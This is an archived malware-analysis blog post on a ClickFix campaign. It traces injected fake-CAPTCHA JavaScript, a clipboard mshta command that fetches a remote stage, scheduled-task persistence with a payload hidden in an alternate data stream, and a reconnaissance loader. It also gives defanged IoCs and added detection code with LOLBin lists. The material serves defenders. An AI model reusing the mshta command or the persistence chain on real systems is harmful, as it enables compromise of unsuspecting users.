{
	"id": "1e2db06f-1cb7-4348-9c68-cccbde387845",
	"created_at": "2026-05-05T02:46:08.277757Z",
	"updated_at": "2026-05-05T02:46:37.118478Z",
	"deleted_at": null,
	"sha1_hash": "433713025f7e2cab3a3a72a0a4624064f9873bf9",
	"title": "Dissecting the ClickFix User-Execution Attack and Its Sophisticated Persistence via ADS",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10513268,
	"plain_text": "Dissecting the ClickFix User-Execution Attack and Its Sophisticated Persistence via ADS\r\nBy Ireneusz Tarnowski\r\nPublished: 2025-07-17 · Archived: 2026-05-05 02:29:10 UTC\r\nJul 16, 2025\r\nThe following analysis presents how an adversary tackled the challenge of malware delivery using a set of techniques that stand out due to their specificity and operational precision. The post is not intended to comprehensively describe the entire campaign or its variants, but instead zooms in on two core components: the use of the ClickFix mechanism and a targeted downloader tailored for controlled execution.\r\nAttribution and infrastructure profiling have been deliberately excluded to maintain focus on the TTPs directly observable within the analyzed payload and initial access phase.\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 1 of 19\r\nThis analysis is intended as a technical aid for defenders, threat hunters, and detection engineers, to deepen understanding of the adversary’s tooling and improve the visibility of similar threat activity across enterprise environments.\r\nAt the time of this report’s publication, all three websites that had been injected with malicious code had been remediated and no longer pose a threat to their visitors.\r\nThe Rise of ClickFix: Malicious Copy-and-Paste as an Initial Access Vector\r\nDuring 2024, a new attack technique emerged in the threat landscape, eventually gaining wider recognition on March 18, 2025, when it was officially added to the MITRE ATT\u0026CK framework as technique T1204.004, User Execution: Malicious Copy and Paste, colloquially referred to as ClickFix.\r\nInitially, this method was primarily leveraged by less sophisticated threat actors operating under the Crime-as-a-Service (CaaS) model. However, as its effectiveness became evident, ClickFix quickly evolved into a viable method for initial access, even in more advanced campaigns. It is now observed as a component in attacks conducted by well-resourced and organized threat groups executing complex intrusion chains.\r\nWhat makes this technique particularly impactful is the strategic shift in responsibility it creates: the attacker pushes the execution burden onto the user. Nothing executable is delivered by mail or download; the victim launches the payload themselves, which effectively bypasses traditional controls designed to detect and block phishing or spear-phishing attempts. This subtle yet powerful change in initial access strategy has significantly lowered the barrier for successful compromise.\r\nObserved Campaign: Watering Hole with ClickFix Delivery\r\nIn recent days, a new attack pattern leveraging the ClickFix technique was observed. The initial access phase began with a watering hole attack, in which legitimate websites related to a specific thematic area were compromised and used to deliver malicious content.\r\nThe attack chain was initiated through the injection of malicious code directly into compromised websites. Although the exact method used to gain access and deploy the payload remains unknown, the technical characteristics of the affected sites suggest a relatively low level of complexity, particularly in the context of outdated CMS frameworks or legacy web applications lacking proper maintenance and regular updates.\r\nThis stage effectively positioned the adversary to deliver further malicious content via trusted, familiar domains, dramatically increasing the likelihood of user interaction.\r\nFigure 1: Example of the first compromised website observed with injected malicious code.\r\nFigure 2: Example of the second compromised website observed with injected malicious code.\r\nInjected Payload Characteristics\r\nBoth compromised websites contained identical malicious JavaScript code (see Figure 3). Although the injected script was the same, its placement within the HTML structure differed slightly between pages, suggesting that the modification was likely performed manually rather than through an automated deployment process.\r\nThe embedded code was heavily obfuscated, clearly intended to hinder static analysis and avoid straightforward detection. This script serves as the entry point for the subsequent stages of the attack and is the starting focus of our deeper technical analysis.\r\nFigure 3: HTML source code of the compromised page containing the injected JavaScript snippet.\r\nDeobfuscation of the Injected Script\r\nThe JavaScript code extracted from the compromised webpage was subjected to a deobfuscation process to improve readability and allow for a clearer understanding of its execution logic. This step was essential to identify the purpose of the script, uncover its control flow, and determine how it initiates the next stage of the attack. The deobfuscated version, shown in Figure 4, reveals the structure and behavior that were intentionally concealed by the obfuscation layer.\r\nFigure 4: Deobfuscated portion of the JavaScript payload injected into the compromised website.\r\nBehavior of the Deobfuscated JavaScript Payload\r\nOnce the document has been parsed and the DOMContentLoaded event fires, the deobfuscated JavaScript code begins its execution. Its primary objective is to render a fullscreen iframe that loads an external webpage hosted at https://1000lifelessons[.]shop/... . This page is designed to visually mimic a CAPTCHA challenge, aiming to gain the user’s trust and encourage interaction.\r\nThe script starts by checking whether the sessionStorage object contains a key named reCAPTCHAv3. If this key is present, it assumes the script has already run during the current session and halts further execution. If the key is not found, the script then verifies whether the browser is running on a Windows operating system by inspecting the userAgent string; the clipboard payload targets the Windows Run dialog, so visitors on other platforms are never shown the lure.\r\nNext, the code checks the value of the same key, reCAPTCHAv3, within localStorage. If the value exceeds 3, the script refrains from displaying the iframe. Otherwise, it proceeds to inject the iframe into the DOM. The injected iframe is styled to cover the entire screen and is positioned above all other elements using a very high z-index, ensuring it remains visually dominant.\r\nOnce the iframe is added, the script updates the state to control its future behavior. It sets the reCAPTCHAv3 key in sessionStorage to 0, effectively preventing the iframe from being shown again in the same session. Simultaneously, it increments the corresponding value in localStorage by one, limiting the number of injection attempts across sessions. For analysts this has a practical consequence: revisiting the site from the same browser profile may show nothing at all, so the lure should be reproduced in a fresh profile or after clearing the site’s storage.\r\nFinally, an event listener is registered to handle message events. If the script receives a message with the content \"closeReCAPTCHA\", it interprets this as a signal to remove the iframe from the page, simulating the expected behavior of a completed CAPTCHA interaction.\r\nThe iframe URL is not stored in clear text; it is kept as a Base64 string and decoded at runtime with atob(). The atob() function in JavaScript decodes Base64-encoded data. The name stands for “ASCII to binary.” It takes a Base64-encoded string as input and returns the decoded string. This function is often used to decode obfuscated or encoded payloads embedded in scripts, especially in malicious JavaScript, where data is intentionally hidden from casual inspection.\r\nFigure 5: Decoded string from the payload revealing the actual source URL of the iframe.\r\nThe next step involves retrieving and analyzing the page referenced as the source of the injected iframe, y6ywH-bTaUOtFHqcS8HqGA2.htm.\r\nFigure 6a: Appearance of the webpage serving as the iframe source.\r\nFigure 6b: Source code of the iframe page highlighting the relevant JavaScript function.\r\nWe extract the JavaScript function and subject it to deobfuscation.\r\nFigure 7: Deobfuscated JavaScript function extracted from the iframe source code.\r\nThe iframe described here is designed to simulate a CAPTCHA challenge, consistent with the behavior observed in the ClickFix technique. It verifies certain conditions, displays graphical images (embedded as Base64-encoded strings directly within the page’s source code), blurs the background (the actual webpage behind the iframe), and presents the user with instructions on how to proceed (as shown in Figure 1). Additionally, as illustrated in Figure 8, it prepares clipboard content for subsequent malicious actions.\r\nFigure 8: Key code snippet showing the content being copied to the clipboard.\r\nThis fragment was decoded using CyberChef.\r\nFigure 9: Decoded content that is copied to the clipboard.\r\nIn this attack, the user is persuaded to execute the code by pasting it from the clipboard into the Run dialog (accessed via the Win+R shortcut). The copied command begins:\r\nmshta \"javascript:eval(decodeURIComponent('new ActiveXObject(\"Shell.Application\").ShellExecute(\"mshta\r\nThis code uses mshta.exe to execute a JavaScript snippet that creates a new ActiveXObject (Shell.Application) to launch a separate mshta.exe process. This second process opens the URL hxxps://1000lifelessons[.]shop/track_v1.dhtml using the default system handler. After initiating this, the script closes the original mshta window. Essentially, it leverages mshta.exe to silently load and execute a remote HTML/JavaScript payload hosted on the attacker’s server. For forensic triage it is worth knowing that Windows records commands entered in the Run dialog under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU, so the pasted mshta command line remains recoverable from the user hive after the window has closed.\r\nEnd of the ClickFix Stage\r\nAt this point, the main part of the ClickFix-based attack concludes. The user, having landed on the compromised website (either via a link received through email or through SEO poisoning), has unknowingly followed the full chain: visiting the site, receiving a malicious payload, and executing it manually.\r\nWhat makes this case particularly noteworthy is that the payload being delivered and executed is an HTML file, which is relatively rare.
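The execution chain above (a Run dialog paste, mshta.exe running inline JavaScript, then a second mshta.exe fetching the remote .dhtml) leaves a distinctive parent-child pattern in process-creation telemetry. The JavaScript below is an added example written for this page, not code from the original post or from the campaign: it applies that pattern as a detection rule to constructed Sysmon-style events. The field names (Image, ParentImage, CommandLine, ProcessId), the sample command lines and the example.invalid host are assumptions. The rule also generalizes beyond this campaign by treating any script host or downloader started from explorer.exe with a URL or script protocol on its command line as a ClickFix candidate, which covers the PowerShell and curl variants mentioned in the text as well as the mshta one.

```javascript
// Added example, not code from the original post: heuristic detection of the
// ClickFix execution chain (Win+R paste -> mshta.exe -> second mshta.exe) over
// constructed process-creation events. Field names follow the Sysmon Event ID 1
// layout as an assumption; adapt them to your EDR or SIEM schema.

// Binaries a ClickFix lure typically asks the victim to launch from the Run box.
const LOLBINS = new Set([
  'mshta.exe', 'powershell.exe', 'pwsh.exe', 'cmd.exe',
  'wscript.exe', 'cscript.exe', 'curl.exe', 'msiexec.exe',
]);

// Inline script protocols and remote URLs: a ClickFix payload is never a local file.
const REMOTE_OR_INLINE = /https?:\/\/|javascript:|vbscript:/i;

// Parent processes that spawn whatever the user types into the Run dialog.
const USER_SHELLS = new Set(['explorer.exe']);

function baseName(imagePath) {
  const parts = String(imagePath || '').split(/[\\/]/);
  return parts[parts.length - 1].toLowerCase();
}

// Returns one finding per matched rule; an event may trigger several rules.
function detectClickFix(events) {
  const findings = [];
  for (const ev of events) {
    const image = baseName(ev.Image);
    const parent = baseName(ev.ParentImage);
    const cmd = ev.CommandLine || '';

    // Rule 1: the paste itself. A LOLBin started by the user shell with an
    // inline script or URL on its command line is the ClickFix signature.
    if (USER_SHELLS.has(parent) && LOLBINS.has(image) && REMOTE_OR_INLINE.test(cmd)) {
      findings.push({ rule: 'clickfix_run_dialog', pid: ev.ProcessId, image, cmd });
    }

    // Rule 2: mshta relaunching mshta (Shell.Application.ShellExecute) to open
    // the remote stage while the first window closes.
    if (image === 'mshta.exe' && parent === 'mshta.exe' && REMOTE_OR_INLINE.test(cmd)) {
      findings.push({ rule: 'mshta_chain_remote_stage', pid: ev.ProcessId, image, cmd });
    }
  }
  return findings;
}

// Constructed sample events (not real telemetry). The command lines mirror the
// shape described in the post: mshta running inline JavaScript, then a second
// mshta opening a remote page; the last event is a benign installer launching
// mshta with a local .hta, which must not fire.
const SAMPLE_EVENTS = [
  { ProcessId: 4100, Image: 'C:\\Windows\\explorer.exe',
    ParentImage: 'C:\\Windows\\System32\\userinit.exe', CommandLine: 'C:\\Windows\\Explorer.EXE' },
  { ProcessId: 5220, Image: 'C:\\Windows\\System32\\mshta.exe',
    ParentImage: 'C:\\Windows\\explorer.exe',
    CommandLine: 'mshta javascript:eval(decodeURIComponent(...))' },
  { ProcessId: 5236, Image: 'C:\\Windows\\System32\\mshta.exe',
    ParentImage: 'C:\\Windows\\System32\\mshta.exe',
    CommandLine: 'mshta https://example.invalid/track_v1.dhtml' },
  { ProcessId: 6000, Image: 'C:\\Windows\\System32\\mshta.exe',
    ParentImage: 'C:\\Temp\\setup.exe', CommandLine: 'mshta C:\\Temp\\eula.hta' },
];

function main() {
  for (const f of detectClickFix(SAMPLE_EVENTS)) {
    console.log(f.rule, 'pid=' + f.pid, f.cmd);
  }
}
main();
```

On the sample data the two rules fire once each (the paste and the mshta-to-mshta hop) and stay silent on the installer event. On live data, feed Sysmon Event ID 1 or the equivalent EDR process records, extend USER_SHELLS if your users launch things from terminals, and keep the LOLBINS list aligned with whatever the lures in your environment ask victims to run; mshta started by an installer with a local .hta is the most common benign case and is deliberately not matched.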
In most similar scenarios, attackers typically drop a compiled executable and rely on PowerShell (often heavily obfuscated) to facilitate execution and further stages of the attack.\r\nIn contrast, this campaign leverages the full JavaScript-based ClickFix chain to deliver and execute a malicious HTML payload, bypassing traditional executable delivery methods. While uncommon, this approach aligns with the known TTPs of the threat actor responsible, showing a preference for browser-native mechanisms and user-driven execution.\r\nStage Two: Download and Execution of the Dropper Component\r\nThe second phase of the attack begins with the execution of the .dhtml file, triggered by the user action initiated via the ClickFix technique. In reality, the downloaded HTML file [track_v1.dhtml] contains a JavaScript payload (Figure 10) which, like the earlier scripts, is obfuscated. Upon analysis, this script reveals several interesting techniques that the attacker chose to employ at this stage of the intrusion chain.\r\nFigure 10: Retrieved and executed .dhtml file.\r\nThis script (Figure 11), executed by mshta.exe (the Microsoft HTML Application host, which uses the same JScript engine as Windows Script Host but is a separate binary), constitutes the second stage of the attack. Its purpose is to establish persistence on the system and prepare a concealed mechanism for repeatedly executing malicious code. Two key techniques are employed here: Windows Scheduled Tasks and Alternate Data Streams (ADS), both widely known in Windows environments as reliable methods for stealthy, long-term presence.\r\nThe script begins by resolving the path to the user’s temporary directory using GetSpecialFolder(2) and then navigates one level up in the directory hierarchy (Figure 11, part 1), which by default lands in %LOCALAPPDATA%. Within this parent directory, it creates a folder named Evernotte, a name that closely resembles the legitimate Evernote application, clearly intended to reduce suspicion during manual inspection. Into this directory, the script copies wscript.exe from the Windows system folder and renames it to Evernote.exe, preserving the file’s functionality while disguising its malicious role (Figure 11, part 2). The copy keeps its Microsoft signature and version resource, so its OriginalFileName field still reads wscript.exe; process telemetry such as Sysmon records that field, and the mismatch between file name and original name is a reliable hunting pivot.\r\nNext, the script leverages the COM interface Schedule.Service to register a scheduled task (Figure 11, part 3). The task is misleadingly named MicrosoftEdgeUpdateTaskMachineCore, mimicking the legitimate Microsoft Edge update task. Its description is carefully crafted to resemble that of a standard Microsoft update process, warning that disabling the task could lead to vulnerabilities, further discouraging user interference. The genuine task of that name runs MicrosoftEdgeUpdate.exe from Program Files (x86)\\Microsoft\\EdgeUpdate, so an action path under a user profile is the tell.\r\nThe task is configured to execute the renamed Evernote.exe with specific arguments pointing to an Alternate Data Stream (ADS) named Zone.Identifier (Figure 11, part 4). This hidden stream is created and written by the script and holds the next JavaScript stage. Using an ADS hides the payload in a way that does not appear in standard directory listings or in Explorer; streams are shown only on request, for example with dir /R or PowerShell’s Get-Item -Stream *. The stream name is itself a disguise: Zone.Identifier is the stream Windows uses to store the Mark-of-the-Web on downloaded files, so an enumerated stream of that name looks expected rather than suspicious. Its content gives it away, since a genuine Mark-of-the-Web record is a few lines of INI text, not a script.\r\nFinally, the task is scheduled to run every 20 minutes for up to 24 hours per day, starting from a fixed (and innocuous-looking) date in the past. This repetition ensures that the malicious payload is executed regularly and reliably, providing the attacker with sustained access and control. The combination of scheduled execution, a misleading task name, and data hidden in an ADS makes this approach particularly stealthy and resilient.\r\nFigure 11: Malicious script with key persistence (3) and ADS-related elements highlighted (4).\r\nThe script described above functions as a dropper, establishing persistence for a file deployed into the system.\r\nThe next step is to analyze the script that was dropped and stored as an Alternate Data Stream (ADS) under Evernote.exe:Zone.Identifier. In addition to the typical obfuscation techniques observed throughout this attack, this particular payload introduces two distinct obfuscation layers: URL encoding and hexadecimal encoding. These layers are stacked to further obscure the script’s actual behavior and hinder both manual inspection and automated detection.\r\nFigure 12: Payload decoded down to the hexadecimal-encoded layer.\r\nAfter decoding the final layer and deobfuscating the result, the last script used in the attack, the one responsible for the actual malicious functionality, was obtained. This script represents the final payload in the chain and executes the core logic intended by the attacker.\r\nFigure 13: Deobfuscated version of the final malicious script.\r\nThe final malicious script, executed from the Zone.Identifier alternate data stream attached to Evernote.exe, functions as a reconnaissance module and dynamic loader. It begins by checking whether any command-line arguments are provided. If none are detected, the script exits immediately. This may serve as a simple anti-analysis mechanism or a form of execution control: the scheduled task most likely passes an argument that a manual launch of the stream would lack.\r\nNext, the script initiates an HTTP POST request to the command-and-control server (Figure 14, part 1) at hxxps://1000lifelessons[.]shop/carhartt-8-pocket-knit-waistband-cargo-jogger.html. Before sending data, it performs extensive system enumeration using Windows Management Instrumentation (WMI). The script collects the current username, computer name, operating system name and version, and the system’s last boot-up time. It also enumerates all currently running processes, gathering their names and process IDs (Figure 14, parts 2 and 3).\r\nThese data points are then aggregated into a single string, which is reversed character-by-character and URL-encoded, a basic yet effective method of obfuscating telemetry before transmission (Figure 14, part 4); URL-decoding the captured POST body and reversing it restores the cleartext. The encoded data are then sent to the C2 server, likely serving both as a passive fingerprinting operation and a filtering mechanism to determine whether the environment is suitable for deploying the next payload.\r\nFollowing this, the script evaluates the execution context by counting the number of files in its own directory. If more than one file is found, it exits immediately, an evasive behavior potentially aimed at avoiding analysis in sandbox environments, where multiple monitoring files may be present. Note that the dropper left the Evernotte folder holding nothing but Evernote.exe, so on a real victim the count is exactly one; copying the sample into a working directory alongside other files triggers the same exit.\r\nIf no exit condition is triggered, the script proceeds to perform a GET request to another URL: hxxps://1000lifelessons[.]shop/tFwrrC9p/captcha/captcha.js. It sets a spoofed User-Agent string to mimic a legitimate Chrome browser on Windows 10. If the server responds with a payload larger than 300,000 characters, the response is URL-decoded and passed to eval() for execution, indicating a dynamic second-stage loader capable of retrieving and executing arbitrary JavaScript code on the fly (Figure 14, part 6). The size check is likely what implements the server-side selectivity: a server that decides not to serve a given victim can answer with a short, benign-looking file and the loader silently does nothing.\r\nFigure 14: Key excerpts from the final loader file.\r\nConclusions\r\nThe ClickFix attack exemplifies a sophisticated and evolving intrusion method that relies on a combination of technical stealth and social engineering. At its core is a tactic that has become increasingly common among threat actors: compromising legitimate websites to serve as watering holes. By injecting malicious JavaScript into trusted sites, attackers can passively lure victims without the need for overt phishing emails or malicious downloads. This approach leverages user trust and topical relevance to increase the likelihood of user engagement and successful payload delivery.\r\nThe ClickFix technique specifically shifts the burden of execution to the user through clipboard hijacking and visual deception. This method bypasses many traditional security controls by exploiting user behavior rather than relying on software vulnerabilities. As a result, the initial stage of the attack often goes unnoticed by conventional detection systems, especially in environments that rely solely on automated threat prevention.\r\nThroughout the attack chain, the adversary demonstrates a high level of operational maturity. The use of obfuscated JavaScript, multi-stage payloads, and Alternate Data Streams (ADS) for stealthy file delivery indicates a deliberate effort to evade detection and resist forensic analysis. The attacker also adapts their infrastructure dynamically, as observed in the July 16, 2025 variant, where changes were made to domain names, file paths, and even scheduled task identifiers to better blend into the victim environment.\r\nOne of the most critical aspects of this attack is the presence of a conditional final-stage loader, observed at the end of the infection chain. This loader gathers detailed telemetry from the victim’s machine, including OS version, username, hostname, system uptime, and a full list of running processes, and sends it back to the attacker’s server. Only if the collected data matches the threat actor’s targeting criteria does the loader fetch and execute a final payload. This selective execution mechanism strongly suggests a targeted campaign, where only systems of interest are subject to full compromise. Such behavior is typical of APT-style operations or campaigns focused on high-value victims.\r\nIn conclusion, ClickFix is more than an isolated technique; it represents a modular and extensible framework for gaining initial access through user deception, and for selectively escalating access based on reconnaissance.
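The persistence stage described above (a renamed wscript.exe copy in a user-profile folder, a vendor-looking scheduled task, the payload in a Zone.Identifier stream) and the reversed, URL-encoded beacon each leave properties a hunter can test mechanically rather than by eye. The JavaScript below is an added example for this page, not the author’s code and not the attacker’s: it scores constructed scheduled-task records against those properties and undoes the beacon encoding. The record layout (TaskName, Description, Execute, Arguments, OriginalFilename, the last taken from the PE version resource that Sysmon logs per image), the file paths, the vendor-name heuristic and the pipe-separated beacon layout are all assumptions; the post does not give the real field layout of the beacon.

```javascript
// Added example, not code from the original post: triage helpers for the
// persistence stage (scheduled task -> renamed wscript.exe -> payload in an ADS)
// and for the reversed, URL-encoded telemetry the final loader POSTs to its C2.
// Record fields are assumptions modelled on Get-ScheduledTask output plus the
// OriginalFilename that Sysmon takes from each image's version resource.

const TRUSTED_DIRS = ['c:\\windows\\', 'c:\\program files\\', 'c:\\program files (x86)\\'];
const SCRIPT_HOSTS = new Set(['wscript.exe', 'cscript.exe', 'mshta.exe']);
// A Windows path whose final component carries a second colon is an ADS
// reference (file.ext:streamname). Paths with spaces would need quote-aware
// parsing; the constructed samples below have none.
const ADS_REF = /[a-z]:\\[^\s:]+:[^\s\\]+/i;
// Task names that borrow a vendor identity; only suspicious when the action
// does not live under that vendor's install directory.
const VENDOR_NAME = /edgeupdate|microsoft|google|autocad|adobe/i;

function baseName(p) {
  const parts = String(p || '').split(/[\\/]/);
  return parts[parts.length - 1].toLowerCase();
}

function inTrustedDir(p) {
  const lower = String(p || '').toLowerCase();
  return TRUSTED_DIRS.some((d) => lower.startsWith(d));
}

// Returns the list of reasons a task record looks like this persistence
// pattern; an empty list means nothing matched.
function triageTask(task) {
  const reasons = [];
  const exe = baseName(task.Execute);
  if (!inTrustedDir(task.Execute)) {
    reasons.push('action binary outside trusted directories');
  }
  // Renamed script host: the file name changed, the version resource did not.
  const original = String(task.OriginalFilename || '').toLowerCase();
  if (SCRIPT_HOSTS.has(original) && original !== exe) {
    reasons.push('renamed script host (' + original + ' as ' + exe + ')');
  }
  if (ADS_REF.test(task.Arguments || '')) {
    reasons.push('argument points into an alternate data stream');
  }
  if (VENDOR_NAME.test(task.TaskName || '') && !inTrustedDir(task.Execute)) {
    reasons.push('vendor-style task name with non-vendor action path');
  }
  return reasons;
}

// The loader joins its telemetry into one string, reverses it, then URL-encodes
// it. Undo that in the opposite order. encodeBeacon reproduces the loader's
// transform so the round trip can be checked offline.
function decodeBeacon(body) {
  return decodeURIComponent(body).split('').reverse().join('');
}
function encodeBeacon(plain) {
  return encodeURIComponent(plain.split('').reverse().join(''));
}

// Constructed samples (not real artifacts). The first record mirrors the
// dropper described in the post; the second is a benign vendor task.
const SAMPLE_TASKS = [
  {
    TaskName: 'MicrosoftEdgeUpdateTaskMachineCore',
    Description: 'Keeps your Microsoft software up to date. Disabling it may leave you vulnerable.',
    Execute: 'C:\\Users\\alice\\AppData\\Local\\Evernotte\\Evernote.exe',
    Arguments: 'C:\\Users\\alice\\AppData\\Local\\Evernotte\\Evernote.exe:Zone.Identifier',
    OriginalFilename: 'wscript.exe',
  },
  {
    TaskName: 'OneDrive Standalone Update Task',
    Description: '',
    Execute: 'C:\\Program Files\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe',
    Arguments: '',
    OriginalFilename: 'OneDriveStandaloneUpdater.exe',
  },
];
// Constructed cleartext; the real separator and field order are unknown.
const SAMPLE_BEACON_PLAIN =
  'user=alice|host=WS01|os=Microsoft Windows 11 Pro 10.0.26100|boot=20250715081200|procs=explorer.exe:4100;mshta.exe:5220';

function main() {
  for (const t of SAMPLE_TASKS) {
    console.log(t.TaskName, '->', triageTask(t).join('; ') || 'clean');
  }
  console.log(decodeBeacon(encodeBeacon(SAMPLE_BEACON_PLAIN)));
}
main();
```

Each reason on its own is weak (plenty of legitimate tasks run from user profiles), so treat the output as a score: the constructed dropper record collects all four reasons, the vendor task none. The beacon helper is for proxy or packet captures of the POST: decode first, reverse second, since the loader reversed before encoding.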
The blending of social engineering, compromised infrastructure, and stealthy persistence mechanisms makes this attack highly effective and difficult to detect. Defenders must look beyond signatures and static indicators, and focus on behavioral detection strategies, particularly those involving unusual use of scripting engines (e.g., mshta.exe), clipboard operations, scheduled tasks, and system reconnaissance activity.\r\nUpdate\r\nOn July 16, 2025, I observed another website containing injected code that followed the same attack chain as previously analyzed. The entire flow of execution, from the malicious JavaScript injection to user interaction and payload delivery, remained consistent. However, there were two notable differences: the domain used to host the malicious payloads had changed, and the attacker modified the persistence mechanism by changing the folder and file names.\r\nIn this variant, the attacker created a folder and executable that impersonated AutoCAD software. Specifically, a new folder named AutoDisk was created, and within it, a file named acad.exe was placed. As in the previous attack, wscript.exe from the system directory was copied to this location. The malicious script also registered a scheduled task with a seemingly legitimate description: “Runs batch plotting for drawing files nightly.” This description is meant to blend in with legitimate AutoCAD-related tasks and avoid detection.\r\nAnother key change was in the configuration of the final-stage loader. The hardcoded User-Agent used in the HTTP request was updated, further helping the traffic blend in with typical browser behavior. Additionally, the size threshold used to validate the downloaded remote JavaScript payload was reduced, from 300,000 characters in the initial attack to 200,000 in this iteration, possibly as an evasion tactic or an adjustment based on payload size optimization.\r\nDetails of the July 16 incident are provided below.\r\nFigure 15a: ClickFix screen from the July 16, 2025 attack.\r\nFigure 15b: Code snippet embedding the iframe, new domain visible.\r\nFigure 15c: Code fragment implementing the persistence mechanism, new file and scheduled task names visible.\r\nFigure 15d: Final fragment, conditional loader with visible domain changes.\r\nFigure 15e: Final fragment, conditional loader with visible domain changes.\r\nTTP\r\nT1189 Initial Access: Drive-by Compromise\r\nAttackers infect legitimate websites by injecting malicious JavaScript.\r\nT1204.004 Execution: User Execution: Malicious Copy and Paste\r\nThe user is tricked into manually executing code pasted into the Run dialog (ClickFix).\r\nhttps://attack.mitre.org/techniques/T1204/004/\r\nT1218.005 Defense Evasion: System Binary Proxy Execution: Mshta\r\nmshta.exe runs the inline JavaScript from the clipboard and then the remote .dhtml stage.\r\nT1059.007 Execution: Command and Scripting Interpreter: JavaScript\r\nJScript executed by mshta.exe and by the renamed wscript.exe copy.\r\nT1053.005 Persistence: Scheduled Task/Job: Scheduled Task\r\nCreating scheduled tasks with names mimicking legitimate system processes (e.g., MicrosoftEdgeUpdateTaskMachineCore).\r\nT1564.004 Defense Evasion: Hide Artifacts: NTFS File Attributes\r\nHiding scripts within alternate data streams of files (e.g., Evernote.exe:Zone.Identifier).\r\nT1027 Defense Evasion: Obfuscated Files or Information\r\nMulti-layered JavaScript obfuscation (URL encoding, hexadecimal encoding, Base64 in the web stages).\r\nT1036.003 Defense Evasion: Masquerading: Rename Legitimate Utilities\r\nwscript.exe copied and renamed to Evernote.exe (acad.exe in the July 16 variant); the look-alike folder Evernotte and the borrowed task name fall under T1036.005 Match Legitimate Name or Location.\r\nT1082 Discovery: System Information Discovery\r\nCollecting information about the operating system, username, computer name and last boot time.\r\nT1057 Discovery: Process Discovery\r\nRetrieving a list of running processes with their process IDs.\r\nT1071.001 Command and Control: Application Layer Protocol: Web Protocols\r\nCommunicating with the C2 server via HTTPS, sending reversed and URL-encoded system telemetry.\r\nT1105 Command and Control: Ingress Tool Transfer\r\nDownloading remote JavaScript (e.g., captcha.js from the C2 server) that is then passed to eval().\r\nIoC\r\nAttack 1\r\nhxxps://1000lifelessons[.]shop/\r\nmain domain used for hosting payloads\r\nhxxps://1000lifelessons[.]shop/v1/Track/y6ywH-bTaUOtFHqcS8HqGA2.htm\r\niframe source page\r\nhxxps://1000lifelessons[.]shop/track_v1.dhtml\r\nsecond-stage payload\r\nhxxps://1000lifelessons[.]shop/carhartt-8-pocket-knit-waistband-cargo-jogger.html\r\nendpoint receiving system telemetry data\r\nhxxps://1000lifelessons[.]shop/tFwrrC9p/captcha/captcha.js\r\ndynamically downloaded remote JavaScript payload\r\nMozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.50 Safari/537.3\r\nUser-Agent\r\nAttack 2\r\nhxxps://channelnewsasia[.]icu/\r\nmain domain used for hosting payloads\r\nhxxps://channelnewsasia[.]icu//_Incapsula_Resource_v1.htm\r\niframe source simulating CAPTCHA\r\nhxxps://channelnewsasia[.]icu/get/css.esca.dhtml\r\nsecond-stage payload\r\nhxxps://channelnewsasia[.]icu/vnmake-Thane-it-sloppily-Macd-With-my-It-welliou.html\r\nendpoint receiving system telemetry data\r\nhxxps://channelnewsasia[.]icu/omsdk/releases/live/omweb-v1.js\r\ndynamically downloaded remote JavaScript payload\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102\r\nUser-Agent\r\nAnalysis date: July 15-16, 2025\r\nSource: https://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b"
	],
	"report_names": [
		"dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b"
	],
	"threat_actors": [],
	"ts_created_at": 1777949168,
	"ts_updated_at": 1777949197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/433713025f7e2cab3a3a72a0a4624064f9873bf9.pdf",
		"text": "https://archive.orkl.eu/433713025f7e2cab3a3a72a0a4624064f9873bf9.txt",
		"img": "https://archive.orkl.eu/433713025f7e2cab3a3a72a0a4624064f9873bf9.jpg"
	}
}